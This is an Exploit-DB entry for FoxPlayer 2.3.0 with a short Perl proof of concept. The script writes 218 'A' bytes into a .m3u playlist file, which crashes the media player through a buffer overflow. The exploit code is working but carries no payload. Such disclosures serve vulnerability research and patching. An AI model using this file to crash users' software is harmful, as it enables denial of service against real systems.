FoxPlayer 2.3.0 - '.m3u' Buffer Overflow

Author: Anastasios Monachos
type: dos
platform: windows
port: 
date_added: 2010-10-10  
date_updated: 2010-10-10  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt15500/15229.png  
application_url: http://www.exploit-db.comfox-player-setup.exe  

raw file: 15229.pl  
#!/usr/bin/perl
###########################################################################
#Title: FoxPlayer Version 2.3.0 (.m3u) Local BOF PoC
#Download: http://www.foxmediatools.com/products/foxplayer.html
#Tested on WinXP Pro SP2
#Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
#Greetz: offsec and inj3ct0r teams
###########################################################################
my $junk= "\x41" x 218 ; #Application will crash with 218 bytes, more will do the job too
open(file,">crash.m3u");
print file $junk ;
close(file);